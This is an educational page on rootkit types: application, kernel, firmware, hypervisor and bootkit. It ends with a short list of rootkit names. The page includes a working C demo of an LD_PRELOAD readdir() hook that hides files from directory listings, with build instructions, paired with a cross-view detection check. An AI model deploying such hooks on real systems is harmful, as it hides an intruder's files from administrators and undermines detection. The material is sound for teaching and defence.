Rootkits
A rootkit is a collection of software designed to give an attacker privileged access to a target system, usually from a remote location. Rootkits are typically deployed after a successful attack, once the attacker already holds administrative access, in order to keep that privileged access for later use. A rootkit creates a backdoor for the attacker, and it normally masks the existence of its own files, processes and network connections so that it escapes detection by the tools an administrator would use to look for it.
Types of Rootkits
Application Level Rootkits
Application Level Rootkits manipulate standard application files, or change the behavior of a running application by injecting code into it (for example by hooking the library functions the application uses to list files or processes). They run with the privileges of the application or user only, which makes them the easiest type to remove but also the easiest to write.
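The file-hiding trick that application-level (userland) rootkits rely on, shown as an added example that is not code from this page or from any of the tools named below: a hook around libc's readdir() swallows every directory entry whose name starts with a magic prefix, so ls, find and similar programs never see those files. The same block carries a cross-view check, the standard counter-measure: a name that stat() confirms exists but that never appears in the directory listing is being hidden from the enumeration path. The prefix "rk_", the file names and the /tmp scratch directory are assumptions made for this demo. Built normally, the hook wraps readdir directly and the program tests itself; built with -DRK_PRELOAD as a shared object, the hook is exported under libc's own name and LD_PRELOAD makes it interpose readdir in every dynamically linked process that loads it.

```c
/* Userland rootkit demo: readdir() hook that hides "rk_*" entries + cross-view check.
 * Stand-alone:  cc -o rkdemo rkdemo.c && ./rkdemo
 * As a hook:    cc -DRK_PRELOAD -shared -fPIC -o rk.so rkdemo.c -ldl
 *               LD_PRELOAD=./rk.so ls /tmp/somedir    (rk_* names vanish) */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define RK_HIDE_PREFIX "rk_"   /* assumed magic prefix: entries starting with it are hidden */

static int rk_should_hide(const char *name)
{
    return strncmp(name, RK_HIDE_PREFIX, strlen(RK_HIDE_PREFIX)) == 0;
}

/* Hook body: call the real readdir and silently skip entries the rootkit hides. */
static struct dirent *rk_filter(struct dirent *(*real)(DIR *), DIR *dirp)
{
    struct dirent *ent;
    while ((ent = real(dirp)) != NULL)
        if (!rk_should_hide(ent->d_name))
            return ent;
    return NULL;
}

#ifdef RK_PRELOAD
#include <dlfcn.h>
/* Exported under libc's name so LD_PRELOAD interposes it; the genuine symbol is
 * resolved lazily with RTLD_NEXT, i.e. from the next object in link order (libc). */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (real_readdir == NULL)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    return rk_filter(real_readdir, dirp);
}
#define HOOKED_READDIR readdir
#else
/* Stand-alone build: no interposition, the hook simply wraps libc's readdir. */
static struct dirent *hooked_readdir(DIR *dirp) { return rk_filter(readdir, dirp); }
#define HOOKED_READDIR hooked_readdir
#endif

/* 1 if 'name' shows up when 'path' is enumerated through the hook, 0 if not, -1 on error. */
int is_listed(const char *path, const char *name)
{
    DIR *d = opendir(path);
    if (!d) return -1;
    struct dirent *ent;
    int found = 0;
    while ((ent = HOOKED_READDIR(d)) != NULL)
        if (strcmp(ent->d_name, name) == 0) { found = 1; break; }
    closedir(d);
    return found;
}

/* Cross-view detection: count candidates that exist on disk (stat succeeds)
 * but are missing from the directory listing. Returns that count. */
int cross_view_hidden(const char *path, const char **candidates, int ncand)
{
    int hidden = 0;
    for (int i = 0; i < ncand; i++) {
        char full[512];
        struct stat st;
        snprintf(full, sizeof full, "%s/%s", path, candidates[i]);
        if (stat(full, &st) != 0) continue;          /* not on disk: nothing to hide */
        if (is_listed(path, candidates[i]) == 0) hidden++;
    }
    return hidden;
}

/* Constructed fixture (not part of the rootkit): a scratch directory holding one
 * visible file and one that the hook hides. Writes the directory path to 'dir'. */
int make_fixture(char *dir, size_t dirlen)
{
    char tmpl[] = "/tmp/rkdemo.XXXXXX";
    if (mkdtemp(tmpl) == NULL) return -1;
    snprintf(dir, dirlen, "%s", tmpl);
    const char *files[] = { "visible.txt", RK_HIDE_PREFIX "secret" };
    for (int i = 0; i < 2; i++) {
        char full[512];
        snprintf(full, sizeof full, "%s/%s", tmpl, files[i]);
        int fd = open(full, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        if (fd < 0) return -1;
        close(fd);
    }
    return 0;
}

#ifndef RK_PRELOAD
int main(void)
{
    char dir[64];
    if (make_fixture(dir, sizeof dir) != 0) return 1;
    const char *cands[] = { "visible.txt", RK_HIDE_PREFIX "secret" };
    printf("%s listed through hook: %d\n", cands[1], is_listed(dir, cands[1]));
    printf("entries exposed by cross-view check: %d\n", cross_view_hidden(dir, cands, 2));
    return 0;
}
#endif
```

The detection half only works because stat() takes a different path into the kernel than readdir() does; a kernel-level rootkit that hooks both (or the getdents and stat system calls underneath them) defeats this userland cross-view, which is why such checks are usually run from a trusted boot medium or from a second vantage point such as a raw read of the block device.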
Kernel-Level Rootkits
The kernel is the core of an OS. Kernel-Level Rootkits add malicious code to the operating system kernel or replace sections of its original code. Because they run at the kernel's privilege level, they can alter what every user-space program is told about files, processes and network connections, so detection tools that ask the compromised kernel for answers cannot be trusted.
Hardware / Firmware Level Rootkits
This type of rootkit hides in the firmware of hardware such as hard drives, network interface cards or the system BIOS, whose code is normally not inspected for integrity and survives reinstalling the OS or replacing the disk. Some such code is built into the chipset for legitimate purposes, such as recovering stolen computers, wiping their data or rendering them useless; the same capability raises privacy and security concerns, since it amounts to undetectable spying if it is abused.
Hypervisor Level Rootkits
Hypervisor Level Rootkits exploit hardware-assisted virtualization features such as Intel VT or AMD-V to insert themselves beneath the running operating system, hosting the target OS as a virtual machine. The OS and its security tools keep running unmodified and therefore have no view of the rootkit that now controls them.
Boot Loader Level Rootkits
Bootloader Level Rootkits (Bootkits) replace the legitimate boot loader with a malicious one, which lets the bootkit run before the OS starts. Bootkits are a serious threat to system security because they infect startup code such as the Master Boot Record (MBR), Volume Boot Record (VBR) or boot sector. They can be used to attack full-disk encryption systems and to capture encryption keys and passwords, because the bootkit is already running when the user types the passphrase that unlocks the disk.
Rootkit Tools
Avatar
Necurs
Azazel
ZeroAccess